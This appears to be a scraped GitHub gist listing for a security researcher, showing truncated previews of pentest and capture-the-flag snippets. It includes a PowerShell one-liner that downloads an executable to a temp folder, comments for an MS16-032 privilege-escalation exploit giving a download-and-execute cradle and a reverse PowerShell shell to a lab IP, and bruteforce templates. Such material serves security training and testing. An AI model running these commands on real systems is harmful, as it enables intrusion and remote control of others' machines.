intrd

🚫
Become a ghost
View GitHub Profile
@intrd
intrd / powershell_wget_oneliner.ps1
Last active October 16, 2021 11:33
Powershell WGET one-liner (anyver)
# Powershell oneliner wget (anyver)
# http://dann.com.br/
@powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:7000/iw4455.exe', 'C:\windows\temp\iw4455.exe')
@intrd
intrd / ghost_disable_google_amp.md
Last active July 4, 2017 15:52
Ghost blogs - fast tip to disable Google AMP

Google AMP is shit! We don't need this fucking our layouts..

Go to /core/server/config/index.js

        internalApps: ['private-blogging', 'subscribers', 'amp'],
        slugs: {
            // Used by generateSlug to generate slugs for posts, tags, users, ..
            // reserved slugs are reserved but can be extended/removed by apps
            // protected slugs cannot be changed or removed
            reserved: ['admin', 'app', 'apps', 'archive', 'archives', 'categories',
@intrd
intrd / hackaflag2017-jp_prog300-encoding.py
Last active April 14, 2018 18:35
Encoding solution - prog300 @ hackaflag 2017 - joao pessoa
#!/usr/bin/python
# -*- coding: utf-8 -*-
## Encoding solution - prog300 @ hackaflag 2017 - joao pessoa
# @author intrd - http://dann.com.br/ + pwn4food team
# int_netcat.py: https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
import re, sys, string, math, time, os, random
sys.path.append("../../LIBS")
from int_netcat import Netcat
@intrd
intrd / ms16_032_intrd_mod.ps1
Last active October 16, 2021 11:33
Win7-Win10 & 2k8-2k12 <== 32/64bit privilege escalation (MS16-032 exploit modded) - command argv + reverse shell
## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv
# Follow this cmd to exploit MS16-032 to get admin and run shell.ps1(ATTACHMNT): Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command YOURCOMANDHERE"
# To get a reverse powershell, serve this ms16_032_intrd_mod.ps1 and Invoke-PowerShellTcp.ps1, and use this download & exec oneliner: IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003"
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
@intrd
intrd / asterisk_bruteforce.py
Last active June 22, 2017 03:20
Nozzlr template : RAW Asterisk Call Management 1.1 (port 5038) - PoC tested on Asterisk Call Manager 1.1 / FPBX-2.8.1(1.8.7.0), maybe still working on future versions.
## Nozzlr template : RAW Asterisk Call Management 1.1 (port 5038) - PoC tested on Asterisk Call Manager 1.1 / FPBX-2.8.1(1.8.7.0), maybe still working on future versions.
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# Make a copy of this template and adapt to your task!
import sys, time
sys.path.append("libs/")
from int_netcat import Netcat
@intrd
intrd / shx10-web200-Read_My_eMail.py
Last active May 24, 2017 04:39
Solution for SHX10 : web200-Read_My_eMail (recover the stream cipher key and create a valid session for every username)
## Solution for SHX10 : web200-Read_My_eMail (recover the stream cipher key and create a valid session for every username)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import hashlib
def xor_bytearray(d, k):
    return bytearray(a^b for a, b in zip(*map(bytearray, [d, k])))
def generate_sessionid(given_username,anyusername):
@intrd
intrd / shx10-misc100_thx.py
Created May 23, 2017 01:11
Solution for SHX10 : misc100-thx (script to vertical slice 1px lines, shuffle and rejoin)
## Solution for SHX10 : misc100-thx (script to vertical slice 1px lines, shuffle and rejoin)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
from __future__ import division
import PIL, Image, random, math, os, time
import numpy as np
from shutil import copyfile
def rejoin(slices,outfilename):
@intrd
intrd / shx8-web200_freelyrics-wordpress_custom_bruteforce.py
Last active April 28, 2017 19:52
Solution to shx8 : web200-freelyrics (Wordpress custom bruteforce w/ nozzlr)
## Nozzlr template : HTTP POST bruteforcer (Solution to shx8 : web200-freelyrics (Wordpress custom bruteforce))
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import urllib, shutil, json, requests, pickle, os.path
target="http://lab.shellterlabs.com:32914"
def nozz_module(payload, self=False, founds=False):
    payloads=':'.join(str(v) for v in payload.values())
@intrd
intrd / iptables_forward_website_port.py
Last active April 28, 2017 15:34
Forward a remote site:port to a localhost:port
#!/bin/sh
# Forward a remote site:port to a localhost:port
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
iptables -F
iptables -t nat -F
iptables -X
sysctl -w net.ipv4.conf.all.route_localnet=1
# -*- coding: utf-8 -*-
import re, sys, string, math, time, os, random
sys.path.append("../../LIBS")
from int_netcat import Netcat
def get_bitn(xx):
    y=8
    for x in range (1,50):
        y=2*y
        if y > xx: